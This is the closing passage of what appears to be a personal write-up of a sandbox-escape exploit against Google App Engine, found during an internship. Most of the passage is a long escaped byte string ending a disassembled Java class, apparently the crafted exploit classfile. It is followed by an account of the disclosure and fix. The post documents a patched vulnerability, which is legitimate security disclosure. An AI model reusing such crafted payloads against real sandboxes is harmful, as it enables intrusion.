\x01\x00\x05s_222\x08\x02"\x01\x00\x05s_224\x08\x02$\x01\x00\x05s_226\x08\x02&\x01\x00\x05s_228\x08\x02(\x01\x00\x05s_22a\x08\x02*\x01\x00\x05s_22c\x08\x02,\x01\x00\x05s_22e\x08\x02.\x01\x00\x05s_230\x08\x020\x01\x00\x05s_232\x08\x022\x01\x00\x05s_234\x08\x024\x01\x00\x05s_236\x08\x026\x01\x00\x05s_238\x08\x028\x01\x00\x05s_23a\x08\x02:\x01\x00\x05s_23c\x08\x02<\x01\x00\x05s_23e\x08\x02>\x01\x00\x05s_240\x08\x02@\x01\x00\x05s_242\x08\x02B\x01\x00\x05s_244\x08\x02D\x01\x00\x05s_246\x08\x02F\x01\x00\x05s_248\x08\x02H\x01\x00\x05s_24a\x08\x02J\x01\x00\x05s_24c\x08\x02L\x01\x00\x05s_24e\x08\x02N\x01\x00\x05s_250\x08\x02P\x01\x00\x05s_252\x08\x02R\x01\x00\x05s_254\x08\x02T\x01\x00\x05s_256\x08\x02V\x01\x00\x05s_258\x08\x02X\x01\x00\x05s_25a\x08\x02Z\x01\x00\x05s_25c\x08\x02\\\x01\x00\x05s_25e\x08\x02^\x01\x00\x05s_260\x08\x02`\x01\x00\x05s_262\x08\x02b\x01\x00\x05s_264\x08\x02d\x01\x00\x05s_266\x08\x02f\x01\x00\x05s_268\x08\x02h\x01\x00\x05s_26a\x08\x02j\x01\x00\x05s_26c\x08\x02l\x01\x00\x05s_26e\x08\x02n\x01\x00\x05s_270\x08\x02p\x01\x00\x05s_272\x08\x02r\x01\x00\x05s_274\x08\x02t\x01\x00\x05s_276\x08\x02v\x01\x00\x05s_278\x08\x02x\x01\x00\x05s_27a\x08\x02z\x01\x00\x05s_27c\x08\x02|\x01\x00\x05s_27e\x08\x02~\x01\x00\x05s_280\x08\x02\x80\x01\x00\x05s_282\x08\x02\x82\x01\x00\x05s_284\x08\x02\x84\x01\x00\x05s_286\x08\x02\x86\x01\x00\x05s_288\x08\x02\x88\x01\x00\x05s_28a\x08\x02\x8a\x01\x00\x05s_28c\x08\x02\x8c\x01\x00\x05s_28e\x08\x02\x8e\x01\x00\x05s_290\x08\x02\x90\x01\x00\x05s_292\x08\x02\x92\x01\x00\x05s_294\x08\x02\x94\x01\x00\x05s_296\x08\x02\x96\x01\x00\x05s_298\x08\x02\x98\x01\x00\x05s_29a\x08\x02\x9a\x01\x00\x05s_29c\x08\x02\x9c\x01\x00\x05s_29e\x08\x02\x9e\x01\x00\x05s_2a0\x08\x02\xa0\x01\x00\x05s_2a2\x08\x02\xa2\x01\x00\x05s_2a4\x08\x02\xa4\x01\x00\x05s_2a6\x08\x02\xa6\x01\x00\x05s_2a8\x08\x02\xa8\x01\x00\x05s_2aa\x08\x02\xaa\x01\x00\x05s_2ac\x08\x02\xac\x01\x00\x05s_2ae\x08\x02\xae\x01\x00\x05s_2b0\x08\x02\xb0\x01\x00\x05s_2b2\x08\x02\xb2\x01\x00\x05s_2b4\x08\x02\xb4\x01\x00\x05s_2b6\x08\x02\xb6\x01\x00\x05s_2b8\x08\x02\xb8\x01\x00\x05s_2ba\x08\x02\xba\x01\x00\x05s_2bc\x08\x02\xbc\x01\x00\x05s_2be\x08\x02\xbe\x01\x00\x05s_2c0\x08\x02\xc0\x01\x00\x05s_2c2\x08\x02\xc2\x01\x00\x05s_2c4\x08\x02\xc4\x01\x00\x05s_2c6\x08\x02\xc6\x01\x00\x05s_2c8\x08\x02\xc8\x01\x00\x05s_2ca\x08\x02\xca\x01\x00\x05s_2cc\x08\x02\xcc\x01\x00\x05s_2ce\x08\x02\xce\x01\x00\x05s_2d0\x08\x02\xd0\x01\x00\x05s_2d2\x08\x02\xd2\x01\x00\x05s_2d4\x08\x02\xd4\x01\x00\x05s_2d6\x08\x02\xd6\x01\x00\x05s_2d8\x08\x02\xd8\x01\x00\x05s_2da\x08\x02\xda\x01\x00\x05s_2dc\x08\x02\xdc\x01\x00\x05s_2de\x08\x02\xde\x01\x00\x05s_2e0\x08\x02\xe0\x01\x00\x05s_2e2\x08\x02\xe2\x01\x00\x05s_2e4\x08\x02\xe4\x01\x00\x05s_2e6\x08\x02\xe6\x01\x00\x05s_2e8\x08\x02\xe8\x01\x00\x05s_2ea\x08\x02\xea\x01\x00\x05s_2ec\x08\x02\xec\x01\x00\x05s_2ee\x08\x02\xee\x01\x00\x05s_2f0\x08\x02\xf0\x01\x00\x05s_2f2\x08\x02\xf2\x01\x00\x05s_2f4\x08\x02\xf4\x01\x00\x05s_2f6\x08\x02\xf6\x01\x00\x05s_2f8\x08\x02\xf8\x01\x00\x05s_2fa\x08\x02\xfa\x01\x00\x05s_2fc\x08\x02\xfc\x01\x00\x05s_2fe\x08\x02\xfe\x01\x00\x05s_300\x08\x03\x00\x01\x00\x05s_302\x08\x03\x02\x00\x01\x00\x02\x00\x04\x00\x00\x00\x00\x00\x01\x00\x01\x00\x05\x00\x06\x00\x01\x00\t\x00\x00\x04\x0f\x07\xd0\x00\n\x00\x00\x04\x03\x12\x08\x12\n\x12\x0c\x12\x0e\x12\x10\x12\x12\x12\x14\x12\x16\x12\x18\x12\x1a\x12\x1c\x12\x1e\x12 \x12"\x12$\x12&\x12(\x12*\x12,\x12.\x120\x122\x124\x126\x128\x12:\x12<\x12>\x12@\x12B\x12D\x12F\x12H\x12J\x12L\x12N\x12P\x12R\x12T\x12V\x12X\x12Z\x12\\\x12^\x12`\x12b\x12d\x12f\x12h\x12j\x12l\x12n\x12p\x12r\x12t\x12v\x12x\x12z\x12|\x12~\x12\x80\x12\x82\x12\x84\x12\x86\x12\x88\x12\x8a\x12\x8c\x12\x8e\x12\x90\x12\x92\x12\x94\x12\x96\x12\x98\x12\x9a\x12\x9c\x12\x9e\x12\xa0\x12\xa2\x12\xa4\x12\xa6\x12\xa8\x12\xaa\x12\xac\x12\xae\x12\xb0\x12\xb2\x12\xb4\x12\xb6\x12\xb8\x12\xba\x12\xbc\x12\xbe\x12\xc0\x12\xc2\x12\xc4\x12\xc6\x12\xc8\x12\xca\x12\xcc\x12\xce\x12\xd0\x12\xd2\x12\xd4\x12\xd6\x12\xd8\x12\xda\x12\xdc\x12\xde\x12\xe0\x12\xe2\x12\xe4\x12\xe6\x12\xe8\x12\xea\x12\xec\x12\xee\x12\xf0\x12\xf2\x12\xf4\x12\xf6\x12\xf8\x12\xfa\x12\xfc\x12\xfe\x13\x01\x00\x13\x01\x02\x13\x01\x04\x13\x01\x06\x13\x01\x08\x13\x01\n\x13\x01\x0c\x14\x01\r\x14\x01\x0f\x13\x01\x11\x14\x01\x12\x14\x01\x14\x14\x01\x16\x14\x01\x18\x14\x01\x1a\x14\x01\x1c\x14\x01\x1e\x14\x01 \x14\x01"\x14\x01$\x14\x01&\x14\x01(\x14\x01*\x14\x01,\x14\x01.\x14\x010\x14\x012\x13\x015\x13\x017\x13\x019\x13\x01;\x13\x01=\x13\x01?\x13\x01A\x13\x01C\x13\x01E\x13\x01G\x13\x01I\x13\x01K\x13\x01M\x13\x01O\x13\x01Q\x13\x01S\x13\x01U\x13\x01W\x13\x01Y\x13\x01[\x13\x01]\x13\x01_\x13\x01a\x13\x01c\x13\x01e\x13\x01g\x13\x01i\x13\x01k\x13\x01m\x13\x01o\x13\x01q\x13\x01s\x13\x01u\x13\x01w\x13\x01y\x13\x01{\x13\x01}\x13\x01\x7f\x13\x01\x81\x13\x01\x83\x13\x01\x85\x13\x01\x87\x13\x01\x89\x13\x01\x8b\x13\x01\x8d\x13\x01\x8f\x13\x01\x91\x13\x01\x93\x13\x01\x95\x13\x01\x97\x13\x01\x99\x13\x01\x9b\x13\x01\x9d\x13\x01\x9f\x13\x01\xa1\x13\x01\xa3\x13\x01\xa5\x13\x01\xa7\x13\x01\xa9\x13\x01\xab\x13\x01\xad\x13\x01\xaf\x13\x01\xb1\x13\x01\xb3\x13\x01\xb5\x13\x01\xb7\x13\x01\xb9\x13\x01\xbb\x13\x01\xbd\x13\x01\xbf\x13\x01\xc1\x13\x01\xc3\x13\x01\xc5\x13\x01\xc7\x13\x01\xc9\x13\x01\xcb\x13\x01\xcd\x13\x01\xcf\x13\x01\xd1\x13\x01\xd3\x13\x01\xd5\x13\x01\xd7\x13\x01\xd9\x13\x01\xdb\x13\x01\xdd\x13\x01\xdf\x13\x01\xe1\x13\x01\xe3\x13\x01\xe5\x13\x01\xe7\x13\x01\xe9\x13\x01\xeb\x13\x01\xed\x13\x01\xef\x13\x01\xf1\x13\x01\xf3\x13\x01\xf5\x13\x01\xf7\x13\x01\xf9\x13\x01\xfb\x13\x01\xfd\x13\x01\xff\x13\x02\x01\x13\x02\x03\x13\x02\x05\x13\x02\x07\x13\x02\t\x13\x02\x0b\x13\x02\r\x13\x02\x0f\x13\x02\x11\x13\x02\x13\x13\x02\x15\x13\x02\x17\x13\x02\x19\x13\x02\x1b\x13\x02\x1d\x13\x02\x1f\x13\x02!\x13\x02#\x13\x02%\x13\x02\'\x13\x02)\x13\x02+\x13\x02-\x13\x02/\x13\x021\x13\x023\x13\x025\x13\x027\x13\x029\x13\x02;\x13\x02=\x13\x02?\x13\x02A\x13\x02C\x13\x02E\x13\x02G\x13\x02I\x13\x02K\x13\x02M\x13\x02O\x13\x02Q\x13\x02S\x13\x02U\x13\x02W\x13\x02Y\x13\x02[\x13\x02]\x13\x02_\x13\x02a\x13\x02c\x13\x02e\x13\x02g\x13\x02i\x13\x02k\x13\x02m\x13\x02o\x13\x02q\x13\x02s\x13\x02u\x13\x02w\x13\x02y\x13\x02{\x13\x02}\x13\x02\x7f\x13\x02\x81\x13\x02\x83\x13\x02\x85\x13\x02\x87\x13\x02\x89\x13\x02\x8b\x13\x02\x8d\x13\x02\x8f\x13\x02\x91\x13\x02\x93\x13\x02\x95\x13\x02\x97\x13\x02\x99\x13\x02\x9b\x13\x02\x9d\x13\x02\x9f\x13\x02\xa1\x13\x02\xa3\x13\x02\xa5\x13\x02\xa7\x13\x02\xa9\x13\x02\xab\x13\x02\xad\x13\x02\xaf\x13\x02\xb1\x13\x02\xb3\x13\x02\xb5\x13\x02\xb7\x13\x02\xb9\x13\x02\xbb\x13\x02\xbd\x13\x02\xbf\x13\x02\xc1\x13\x02\xc3\x13\x02\xc5\x13\x02\xc7\x13\x02\xc9\x13\x02\xcb\x13\x02\xcd\x13\x02\xcf\x13\x02\xd1\x13\x02\xd3\x13\x02\xd5\x13\x02\xd7\x13\x02\xd9\x13\x02\xdb\x13\x02\xdd\x13\x02\xdf\x13\x02\xe1\x13\x02\xe3\x13\x02\xe5\x13\x02\xe7\x13\x02\xe9\x13\x02\xeb\x13\x02\xed\x13\x02\xef\x13\x02\xf1\x13\x02\xf3\x13\x02\xf5\x13\x02\xf7\x13\x02\xf9\x13\x02\xfb\x13\x02\xfd\x13\x02\xff\x13\x03\x01\x13\x03\x03\x03\xac\x00\x00\x00\x00' 
.end method 
.end class 

Aftermath

Getting the exploit working took most of the week, so I didn’t have much time or inclination to try to extend the hack further beyond my foothold on the App Engine servers. I just gave a presentation about the exploit to interested people the final day, collected my end-of-internship Google swag, etc.

In order to remediate this vulnerability, the App Engine team changed the system to run ASM again on its own output to check for discrepancies, thus preventing this entire class of exploit in the future. They also did a scan of all existing App Engine applications to see if anyone had tried to exploit it in the wild (luckily not). Finally, the overflow bug in ASM was quietly reported and patched upstream.

Anyway, this was a pretty long post (I’ve been working on it for the last six weeks) but I hope it was interesting and informative. If you have any questions, feel free to comment on Reddit or send me a PM.